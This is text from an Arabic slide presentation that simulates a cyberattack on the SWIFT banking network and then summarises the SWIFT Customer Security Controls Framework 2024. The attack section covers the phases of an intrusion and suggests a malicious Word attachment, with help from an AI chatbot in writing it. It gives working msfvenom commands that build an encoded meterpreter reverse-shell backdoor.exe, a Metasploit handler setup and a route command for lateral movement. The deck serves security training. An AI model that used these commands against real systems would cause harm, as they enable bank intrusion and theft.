Download as pdf or txt
Download as pdf or txt
You are on page 1of 26

‫محاكات لهجوم سيبراني ملنظومة سويفت‬

‫مقاربة القراصنة الهجومية‬


‫‪ ‬االستطالع‪ :‬يتضمن جمع معلومات حول الهدف‪ ،‬مثل االسم والعنوان والنشاط واألنظمة ونقاط الضعف وما‬
‫إلى ذلك‪ .‬يمكن تنفيذ هذه املرحلة بشكل سلبي (دون التفاعل مع الهدف) أو بشكل نشط (باستخدام أدوات‬
‫مثل ماسحات املنافذ‪ ،‬واختبارات االتصال‪ ،‬ومسارات التتبع‪ ،‬وما إلى ذلك)‪.‬‬
‫مقاربة القراصنة الهجومية‬
‫‪ ‬املسح‪ :‬يتضمن ذلك اختبار الهدف لتحديد الثغرات األمنية والخدمات املفتوحة واملنافذ والبروتوكوالت‬
‫والتطبيقات وما إلى ذلك‪ .‬يمكن إجراء هذه املرحلة بشكل ثابت (من خالل تحليل الكود املصدري أو التكوين) أو‬
‫ً‬
‫ديناميكيا (من خالل تشغيل أدوات مثل أدوات فحص الثغرات األمنية واملتشممين والوكالء وما إلى ذلك)‪.‬‬
‫مقاربة القراصنة الهجومية‬
‫‪ ‬الحصول على حق الوصول‪ :‬يتضمن ذلك استغالل نقاط الضعف املحددة للوصول إلى نظام الهدف‪،‬‬
‫باستخدام تقنيات مثل التصيد االحتيالي‪ ،‬والقوة الغاشمة‪ ،‬وتجاوز سعة املخزن املؤقت‪ ،‬وحقن ‪،SQL‬‬
‫والبرمجة النصية عبر املواقع‪ ،‬وما إلى ذلك‪ .‬يمكن تنفيذ هذه املرحلة ً‬
‫محليا (من خالل الوصول الفعلي إلى‬
‫الجهاز) أو عن بعد (باستخدام شبكة أو إنترنت)‪.‬‬
‫مقاربة القراصنة الهجومية‬
‫‪ ‬الحفاظ على الوصول‪ :‬يتضمن ذلك الحفاظ على الوصول إلى نظام الهدف‪ ،‬باستخدام تقنيات مثل تثبيت‬
‫األبواب الخلفية‪ ،‬والجذور الخفية‪ ،‬وبرامج تسجيل املفاتيح‪ ،‬وأحصنة طروادة‪ ،‬وما إلى ذلك‪ .‬تهدف هذه املرحلة‬
‫إلى ترسيخ االستمرارية والتسلل وتصعيد االمتيازات‪.‬‬
‫مقاربة القراصنة الهجومية‬
‫‪ ‬إخفاء اآلثار‪ :‬يتضمن ذلك محو أدلة الهجوم‪ ،‬باستخدام تقنيات مثل حذف السجالت‪ ،‬وتعديل الطوابع‬
‫الزمنية‪ ،‬وتعطيل عمليات التدقيق‪ ،‬وتشفير البيانات‪ ،‬وما إلى ذلك‪ .‬تهدف هذه املرحلة إلى تجنب الكشف‬
‫والتتبع واملسؤولية‪.‬‬
‫الخطوة األولى‬

‫‪ ‬اختيار ناقالت الهجوم‬


‫‪ ‬تمكن من تجاوز الجدار الناري‬
‫‪ ‬تمكن من استهداف حواسيب داخلية‬
‫‪ ‬ال يمكن كشفها بالوسائل التقليدية‬
‫التحضير‬
‫‪ ‬اختيار مرفق ال يبعث على الشك (ورد مثال )‬
‫‪ ‬زرع وظيفة خبيثة تقوم بتنزيل البرمجية التابعة‬
‫للقرصان‬
‫‪ ‬يمكن االستئناس بذكاء االصطناعي وذلك لربح‬
‫الوقت وتسهيل عملية البرمجة كبارد التابع‬
‫لجوجل‬
‫‪ ‬بدء التبادل مع الخادم الخبيث‬
‫التحضير‬
msfvenom ‫ تحضير البرمجية الخبيثة باستعمال‬

$ export PAYLOAD_X86=windows/meterpreter/reverse_tcp
$ export PAYLOAD_X64=windows/x64/meterpreter/reverse_tcp
$ export LHOST=192.168.6.66
$ export LPORT=6666

msfvenom -p "$PAYLOAD_X64" LHOST="$LHOST"


LPORT="$LPORT" -e x64/zutto_dekiru -i 3 -b 'x00' -f exe-only
> backdoor.exe
‫التحضير‬
‫ املوزع املسيطر أو املسير‬/ ‫ تحضير الخادم‬

msf > use exploit/multi/handler


msf exploit(multi/handler) > set PAYLOAD
windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.6.66
LHOST => 192.168.6.66
msf exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf exploit(multi/handler) > exploit -j
‫التنقل الجانبي‬
‫‪ ‬توجيه دفق البيانات عبر الشبكة املفتوحة‬

‫‪route add 169.254.0.0 255.255.0.0 1‬‬


‫عرض عملي‬
‫إطار عمل سويفت للتحكم في أمان العمالء ‪V2024‬‬

‫ً‬
‫‪ ‬تم إطالقه في عام ‪ 2016‬استجابة للهجمات اإللكترونية املتطورة التي تعرض لها مستخدمو سويفت‪ ،‬يهدف برنامج أمن العمالء ( )‪CSP‬إلى الحفاظ على األمن السيبراني‬
‫املناسب األمني بطريقة عملية لجميع املستخدمين‪ ,‬الحد من مخاطر الهجمات اإللكترونية وتقليل األثر املالي للمعامالت االحتيالية‪ .‬املعامالت االحتيالية‬
‫‪ ‬تأكيد االمتثال كل سنة‬
‫‪ ‬تعتمد جميع الضوابط على ثالثة أهداف رئيسية‪:‬‬
‫تأمين بيئتك‬ ‫‪‬‬
‫التحكم في الوصول والحد من الوصول‬ ‫‪‬‬
‫الكشف والتفاعل‬ ‫‪‬‬
‫أهداف ومبادئ اإلطار‬

‫‪3‬أهداف‬ ‫‪ ‬تقييد الوصول إلى اإلنترنت وفصل األنظمة املهمة عن بيئة تكنولوجيا املعلومات العامة والبيئة املكتبية‬
‫‪ ‬تقليل سطح الهجوم ونقاط الضعف‬
‫ً‬
‫‪ ‬تأمين البيئة ماديا‬

‫‪7‬مبادئ‬ ‫‪ ‬حماية نفسك ضد سرقة الهوية‬


‫‪ ‬إدارة الهويات وفصل االمتيازات‬
‫‪ ‬كشف األنشطة غير الطبيعية في األنظمة أو سجالت التشغيل‬

‫‪32‬ضوابط‬
‫‪ ‬وضع خطة عمل في حالة وقوع حادث ومشاركة معلومة‬
‫هندسة البنيان أ ‪1‬‬
‫هندسة البنيان أ ‪1‬‬
‫هندسة البنيان أ ‪2‬‬
‫هندسة البنيان أ ‪3‬‬
‫هندسة البنيان أ ‪4‬‬
‫هندسة البنيان ب‬
‫الضوابط‬
‫نوع هندسة البنيان‬

‫الضوابط األمنية اإللزامية واالستشارية‬ ‫‪A1‬‬ ‫‪A2‬‬ ‫‪A3‬‬ ‫‪A4‬‬ ‫‪B‬‬

‫‪1‬محاصرة وصول اإلنترنت وحماية األنظمة الحاسمة من البيئة العامة لتقنية المعلومات‬

‫‪Swift‬حماية بيئة تقنية المعلومات ‪1.1‬‬ ‫●‬ ‫●‬ ‫●‬

‫مراقبة حساب المستخدم المميز في نظام التشغيل ‪1.2‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬

‫حماية منصة االفتراضية أو السحابية ‪1.3‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬

‫قيود الوصول إلى اإلنترنت ‪1.4‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬

‫حماية بيئة العمالء ‪1.5‬‬ ‫●‬


‫الضوابط‬
‫نوع هندسة البنيان‬

‫ال ضوابط األمنية اإللزامية واالستشارية‬ ‫‪A1‬‬ ‫‪A2‬‬ ‫‪A3‬‬ ‫‪A4‬‬ ‫‪B‬‬
‫‪ 2‬تقليل سطح ال هجوم وال ثغرات‬
‫الحماية الداخلية لتدفق البيانات ‪2.1‬‬ ‫●‬ ‫●‬ ‫●‬
‫تحديثات األمان ‪2.2‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫تقوية النظام ‪2.3‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫أمان تدفق البيانات في النظام الخلفي ‪2.4A‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫حماية بيانات النقل الخارجية ‪2.5A‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫سرية فتحة المشغل ونزاهتها ‪2.6‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫فحص الضعف األمني ‪2.7‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫المفوضة ‪2.8‬‬
‫َّ‬ ‫حماية األنشطة الحرجة‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫تحكمات التعامالت التجارية ‪2.9‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫تطوير تطبيق الحماية ‪2.10‬‬ ‫●‬ ‫●‬ ‫●‬
‫تحكمات أعمال آر إم آي ‪2.11A‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫الضوابط‬
‫نوع هندسة البنيان‬

‫ال ضوابط األمنية اإللزامية واالستشارية‬ ‫‪A1‬‬ ‫‪A2‬‬ ‫‪A3‬‬ ‫‪A4‬‬ ‫‪B‬‬
‫‪ 3‬تأمين البيئة ماديا ً‬
‫األمن المادي ‪3.1‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫‪ 4‬منع اختراق بيانات االعتماد‬
‫سياسة كلمة المرور ‪4.1‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫المصادقة العاملة بعوامل متعددة ‪4.2‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫‪ 5‬إدارة ال هويات وفصل االمتيازات‬
‫التحكم في الوصول ‪5.1‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫إدارة الوصول التعريفي ‪5.2‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫عملية فحص العاملين ‪5.3A‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫حماية مستودع كلمات المرور ‪5.4‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫الضوابط‬
‫نوع هندسة البنيان‬

‫ال ضوابط األمنية اإللزامية واالستشارية‬ ‫‪A1‬‬ ‫‪A2‬‬ ‫‪A3‬‬ ‫‪A4‬‬ ‫‪B‬‬
‫‪ 6‬كشف النشاط غير ال طبيعي في أنظمة أو سجالت المعامالت‬
‫حماية ضد البرامج الضارة ‪6.1‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫سالمة البرمجيات ‪6.2‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫تكامل قاعدة البيانات ‪6.3‬‬ ‫●‬ ‫●‬ ‫●‬
‫التسجيل والمراقبة ‪6.4‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫الكشف عن التسلل ‪6.5A‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫‪ 7‬خطة استجابة للحوادث ومشاركة المعلومات‬
‫تخطيط استجابة الحوادث السيبرانية ‪7.1‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫التدريب والتوعية األمنية ‪7.2‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫اختبار االختراق ‪7.3A‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫تقييم المخاطر بنا ًء على السيناريو ‪7.4A‬‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬ ‫●‬
‫النموذج الموصي به‬
‫شكراً على حسن االنتباه‬

You might also like